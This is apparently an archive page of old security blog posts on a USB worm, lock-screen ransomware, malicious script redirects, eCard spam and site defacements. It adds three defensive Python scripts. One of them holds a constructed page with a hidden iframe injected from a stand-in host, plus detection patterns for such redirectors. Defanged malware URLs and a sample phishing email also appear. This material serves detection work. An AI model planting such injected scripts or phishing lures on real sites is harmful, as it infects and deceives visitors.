TrendLabs Security Intelligence Blog

    Author Archive - Mayee Corpin (Technical Communications)


    A batch of China-made media players sold over the holidays by a Dutch importer was found to carry malware. PCWorld, citing a Kaspersky blog post, identified the malware to be a worm. Trend Micro detects it as PE_FUJACKS.FL-O, a file infector that propagates not only via removable drives but also via network shares.

    The particular model involved is the 512 MB USB media player called Victory LT-200, which is sold by Victory Nederland. By the first week of January, only three customers had complained about the malware, according to the company’s managing director, Joost Blom, in an interview with PCWorld.

    This file infector searches the affected system for files with the following extensions:

    • COM
    • EXE
    • PIF
    • SCR

    These infected files are detected as PE_FUJACKS.EA.
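    A file infector that spreads over removable drives and network shares leaves a trace a defender can check for: executables on the medium that were not there before, or that changed (and typically grew) since they were last seen. The script below is an added example, not code from the original post or from Trend Micro; it baselines every file with one of the four extensions listed above under a mount point and reports what changed on a later pass. The drive contents and the simulated infection are constructed in a temporary directory so the example runs offline.

```python
"""Added example (not from the original post): baseline and re-check
executable files on a removable drive or network share for the extensions
a file infector targets. Paths and sample files are constructed."""
import hashlib
import os
import tempfile

# Extensions the post says PE_FUJACKS.FL-O searches for (compared case-insensitively).
TARGET_EXTENSIONS = {".com", ".exe", ".pif", ".scr"}


def sha256_of(path):
    """Hash a file in chunks so large executables do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Map relative path -> (size, sha256) for every target-extension file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in TARGET_EXTENSIONS:
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root)
                manifest[rel] = (os.path.getsize(full), sha256_of(full))
    return manifest


def diff_manifests(baseline, current):
    """Compare two manifests. A file infector appends or prepends its body to
    existing executables, so a hash change combined with growth ('grown') is
    the strongest signal; 'modified' lists every hash change, 'added' new files."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified, grown = [], []
    for rel in set(baseline) & set(current):
        if baseline[rel][1] != current[rel][1]:
            modified.append(rel)
            if current[rel][0] > baseline[rel][0]:
                grown.append(rel)
    return {"added": added, "modified": sorted(modified),
            "grown": sorted(grown), "removed": removed}


def demo():
    """Constructed scenario: baseline a fake drive, then simulate an infection."""
    with tempfile.TemporaryDirectory() as drive:
        os.makedirs(os.path.join(drive, "tools"))
        sample_files = {"setup.exe": b"MZ original program",
                        "tools/view.scr": b"MZ screensaver",
                        "readme.txt": b"not an executable, ignored by the scan"}
        for rel, data in sample_files.items():
            with open(os.path.join(drive, rel), "wb") as handle:
                handle.write(data)
        baseline = build_manifest(drive)
        # Simulated infector behaviour: append to an existing EXE and drop a new one.
        with open(os.path.join(drive, "setup.exe"), "ab") as handle:
            handle.write(b"<constructed infector body>")
        with open(os.path.join(drive, "autorun_helper.exe"), "wb") as handle:
            handle.write(b"MZ dropped file")
        return diff_manifests(baseline, build_manifest(drive))


if __name__ == "__main__":
    print(demo())
```

    In practice the baseline manifest should be stored off the medium it describes, since a drive that can be written by the worm can also have its manifest rewritten.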

    The Victory LT-200 is the latest in a long list of USB media shipped with malware. October 2006 alone saw two such incidents: iPod videos manufactured after September 11 of that year were shipped with WORM_SIWEOL.A, and McDonald’s Japan recalled MP3 player freebies that were found to be infected with WORM_QQPASS.ADH.

    In the same year, satellite navigation devices called TomTom GO 910 shipped between September and November were confirmed to contain two Trojans detected as TROJ_PERLOVGA.A and TROJ_GENERIC. In 2007, another USB infection was seen, this time involving a rootkit detected as RTKT_XCP.B, which is installed along with the Sony MicroVault USM-F fingerprint reader application. This app allows a user to restrict access to files stored in the Sony MicroVault USM-F USB drive through the recognition of user-preset fingerprints.

    This latest USB incident again serves as a reminder that new doesn’t always mean safe. Be careful of plug-and-play peripherals that could bring off-the-shelf malware. Lucky for Trend Micro customers, they are now protected from this threat.

     
    Posted in Malware | Comments Off



    A new Trojan locks up machines completely and makes unwitting victims fork over an amount to be able to access their systems again, Sunbelt first reported. Trend Micro detects the said ransomware Trojan as TROJ_RANSOM.B.

    TrendLabs found that users could download the said malware from the site http://{BLOCKED}s-numericos.info/handlers/get.php?aid=46. Once it is on a system and has dropped its components, it renders the user incapable of using his machine and displays the following image:

    The message on top of the screen reads:

    ERROR: Browser Security and Antiadware Software component license exprited!

    Surfing PORN, ADULT and some other kind of sites you like without this software is dangerows and threatens with infection of your computer by harmful viruses, adware, spyware, etc… You strongly need to update your software to avoid infection and losting information from your computer. Please complete procedure of software update;

    Because the system’s “antiadware software” has supposedly expired, the Trojan asks for a reactivation fee that affected users can pay either through SMS (short messaging service) or by phone. If the user chooses the former, he/she only needs to send a text message to a specified number and will be charged £10, if in the UK. If, however, he/she chooses to make the call, he/she will be charged $35 in the US (or £1.50 for every minute, in the UK). Either way, the user receives a “license code” that is the key to the “system unlock” and lets him/her use the system again.

    The numbers used are premium rate, according to The Register, and differ depending on which country the user is in. In the UK, the regulator PhonePayPlus has said in an interview with the aforementioned IT news site that an adult line could have been misused for this purpose.

    The last we had seen of ransomware was back in August, when TROJ_GPCODE.AB and TROJ_GPCODE.AC were found to encrypt files with certain extensions, demanding $150 to have the user’s files decrypted. A little earlier, in July, another ransomware detected as TSPY_KOLLAH.F also encrypted files with certain extensions, but demanded a heftier price ($300) to decrypt the files with its software. Both left behind ransom notes in README text files, offering software that could crack open the files, with set deadlines, too.

    This new strain takes a different tactic: it actually sounds more polite, even saying the magic word “please”. Even so, it is crueler in the sense that it holds not just certain files but the machine itself hostage.

    Trend Micro customers are already protected from this threat and won’t find themselves locked out of their systems.

     
    Posted in Malware | Comments Off



    Cybercriminals wasted no time riding on the tragic and shocking news of former Pakistan Prime Minister Benazir Bhutto’s assassination, as Websense discovered a number of malicious Web sites that came up on Google search results using the simple search term “benazir.” These sites attempt to infect users who want to know more about the unfortunate incident.

    TrendLabs researchers found that one of the sites in question indeed has an embedded malicious JavaScript redirect, which Trend Micro detects as JS_AGENT.AEVE.

    The malicious script downloads a Trojan (already detected as TROJ_SMALL.LDZ), which in turn downloads more malicious files, namely WORM_HITAPOP.O and TROJ_AGENT.AFFR.

    A graphical representation of this routine is as follows:

    Upon further investigation, however, TrendLabs found that there is a host of other news sites and blogs taking advantage of this news.

    Moreover, the malicious JavaScript is apparently not exclusive to news sites — it is also present in other Web sites with a broad scope of topics and interests. There are many other sites that have been possibly compromised (or that include the malicious JavaScript), including Autoworld, Vino, Dogpile, MSN, BlogSpot (yes, again), etc.

    According to Trend Micro Advanced Threats Researcher Paul Ferguson, searching for the URL of this same malicious script yields 4,240 results. Narrowing the search to also include “benazir” leaves only 103 results.

    All related malicious URLs are already blocked by the Content Security Team and are thus inaccessible to Trend Micro customers.
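    The common thread across the compromised sites above is a script injected into otherwise legitimate pages that pulls in or redirects to attacker-controlled content. A site owner can audit saved pages for exactly that: external script sources whose host is not on the site’s own allowlist, and inline script bodies that write an iframe or rewrite the location. The code below is an added example, not code from the original post or from Trend Micro; the sample page, the `injected-host.test` host and the allowlist are constructed.

```python
"""Added example (not from the original post): flag injected <script> tags in
saved HTML pages. Sample page, host names and allowlist are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_inline_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_inline_script = False

    def handle_data(self, data):
        # HTMLParser treats <script> content as CDATA, so the body arrives here intact.
        if self._in_inline_script:
            self.inline.append(data)


# Inline constructs typical of injected redirectors. This is a heuristic for
# auditing one's own site; tune it for the scripts the site legitimately uses.
REDIRECT_PATTERNS = re.compile(
    r"document\.write\s*\(|window\.location\s*=|location\.href\s*=|<iframe", re.I)


def find_injected_scripts(html, allowed_hosts):
    """Return (kind, detail) findings: external scripts from hosts outside the
    allowlist, and inline scripts matching redirect patterns. Relative script
    paths have no host and are treated as same-origin."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host and host.lower() not in allowed_hosts:
            findings.append(("external-script", src))
    for body in parser.inline:
        if REDIRECT_PATTERNS.search(body):
            findings.append(("inline-redirect", body.strip()))
    return findings


# Constructed page: one legitimate script, one foreign script, one injected iframe writer.
SAMPLE_PAGE = """<html><head><title>Constructed news page</title>
<script src="https://static.example-news.test/site.js"></script>
</head><body><p>Article text about the day's headline.</p>
<script src="http://injected-host.test/counter.js"></script>
<script>document.write('<iframe src="http://injected-host.test/x.php" width=0 height=0></iframe>');</script>
</body></html>"""

ALLOWED_HOSTS = {"static.example-news.test", "www.example-news.test"}


def demo():
    return find_injected_scripts(SAMPLE_PAGE, ALLOWED_HOSTS)


if __name__ == "__main__":
    for kind, detail in demo():
        print(kind, detail)
```

    Run over a crawl of the site, the same function gives the per-page count the post describes from the search-engine side: which pages carry the foreign script, and therefore which templates or includes were modified.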

     



    It’s the most wonderful time of the year for most, including spammers who have started churning out Christmas-themed eCards in light of the approaching holidays.

    Spammers would like recipients to believe that these eCards come from a legitimate sender; the spoofed From line displays the name of a reputable company. Interestingly, the mail body bears the phrase “no worm, no virus” to falsely allay users’ fears of infection. But of course, since spammers are not exactly purveyors of truth, users do get infected.

    Clicking on the link http://{BLOCKED}tery.us/?id=ecard within the message body redirects users to the site http://{BLOCKED}n.unixbsd.info/~nuevocom/ItYatOk/index.php?, which hosts an obfuscated script detected by Trend Micro as JS_AGENT.AEGJ; that script in turn downloads TROJ_DLOADER.XAP. The same script is also hosted on the following sites:

    • http://{BLOCKED}n.unixbsd.info/~nuevocom/ItYatOk/
    • http://64.27.{BLOCKED}.137/~nuevocom/ItYatOk/YM.exe
    • http://64.27.{BLOCKED}.137/~nuevocom/ItYatOk/uslotttery.exe

    The last two sites download files that are detected as WORM_SOHANAD.EU and WORM_VB.FQO, respectively.

    Christmas Day is some days away and in the interim, we can expect a glut of eCards of this nature. Remember that no matter how enticing, fancy eCards may not be out to spread good cheer but malware.
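    The three tells the post describes (a reputable display name on a From address that does not belong to that brand, a pickup link pointing at an unrelated host, and a “no worm, no virus” reassurance) can be checked mechanically at the mail gateway. The following is an added example, not code from the original post or from Trend Micro: it parses a constructed raw message with the standard library and returns the reasons it would flag it. The brand-to-domain allowlist, the addresses and the hosts are all constructed.

```python
"""Added example (not from the original post): triage an eCard-style message
for the spoofing tells described above. Message, domains and allowlist are constructed."""
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample: brand name in the display part, unrelated sending domain,
# pickup link on a third host, and the reassurance phrase from the post.
SAMPLE_MAIL = """From: "Reputable Greetings Inc." <ecards@mail-relay.example.test>
To: victim@example.test
Subject: You have received a Christmas eCard!
Content-Type: text/plain; charset=us-ascii

Someone who cares about you has sent you an eCard.
Pick it up here: http://ecard-lottery.example.test/?id=ecard
No worm, no virus! Safe to open.
"""

# Constructed allowlist: lowercase brand keyword -> domains that brand really sends from.
BRAND_DOMAINS = {"reputable greetings": {"greetings.example.test"}}

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.I)
REASSURANCE_RE = re.compile(r"no\s+(worm|virus)", re.I)


def extract_urls(body):
    return URL_RE.findall(body)


def triage_ecard(raw_message, brand_domains):
    """Return a list of human-readable reasons the message looks like eCard spam."""
    msg = message_from_string(raw_message)
    display, addr = parseaddr(msg.get("From", ""))
    from_domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    reasons = []

    # Tell 1: display name claims a brand whose real domains do not include the sender's.
    for keyword, domains in brand_domains.items():
        if keyword in display.lower() and from_domain not in domains:
            reasons.append(f"display name claims '{keyword}' but sender domain is {from_domain}")

    # Tell 2: pickup links go to a host unrelated to the sender domain.
    body = msg.get_payload(decode=True).decode("utf-8", "replace")
    for url in extract_urls(body):
        host = (urlparse(url).hostname or "").lower()
        if host and host != from_domain and not host.endswith("." + from_domain):
            reasons.append(f"link host {host} does not match sender domain {from_domain}")

    # Tell 3: the body pre-emptively reassures the reader about malware.
    if REASSURANCE_RE.search(body):
        reasons.append("body reassures 'no worm, no virus'")
    return reasons


def demo():
    return triage_ecard(SAMPLE_MAIL, BRAND_DOMAINS)


if __name__ == "__main__":
    for reason in demo():
        print("-", reason)
```

    None of the three checks is conclusive alone (legitimate greeting services do use third-party link hosts), which is why the function returns reasons for a scorer rather than a verdict.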

     
    Posted in Spam | 1 TrackBack »



    The world is not wanting in conflicts, either on the ground or online. A Web war is at present raging between Sweden and Turkey, said to be precipitated by another caricature of Islam’s Prophet Muhammad.

    More than 5,000 Swedish Web sites have been defaced by Turkish hackers since early October, according to the International Herald Tribune. Files were removed from the sites, which are mostly related to hotels, while some were replaced by messages posted by the hackers.

    Here’s a screenshot of a hacked Swedish site:

    Sample of a hacked Swedish site

    And a screenshot of another Web page that may be related to the group that defaced the Swedish sites:

    Although the link is not clearly established, the said defacement is believed to come in the wake of the publication of an editorial “moodog” cartoon, which showed the holy prophet’s head attached to a dog’s body. Indeed, some of the sites saw messages saying that the prophet had been violated. The said drawing was done by Lars Vilks and published in the Swedish newspaper Nerikes Allehanda on August 19. Vilks has since received a sizeable bounty on his head from an Iraqi insurgent leader.

    Sweden’s own hackers retaliated by putting up pornographic images in which the prophet and Mustafa Kemal Ataturk, founder and first President of the Turkish Republic, appear. The said images came out in a Turkish discussion forum whose members allegedly hacked the Swedish sites. Moreover, the Swedes stole the members’ user names, passwords, and homepages, along with their Hotmail and MSN instant messenger accounts. They also spammed out ugly, damaging messages to the Turkish account owners’ contacts.

    Trend Micro Senior Threat Researcher Ivan Macalintal cites inside accounts in saying that “this incident did not involve any of the usual malware activity that we usually find in Web threats. This was (more) like a socio-political and religious Web warfare between hacker groups in Turkey and Sweden.”

    It can be recalled that in 2005, a similar uproar was heard throughout the globe, caused by another of the prophet’s caricatures published in a Danish newspaper. This time around, the Web was the go-to platform for the Muslim protests, which were aired via hacking that was only met with more sophisticated hacking, a case of fighting fire with fire. It proves nothing but that the innocent, online users or not, always get caught in the crossfire.

     
    Posted in Bad Sites | Comments Off


     

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice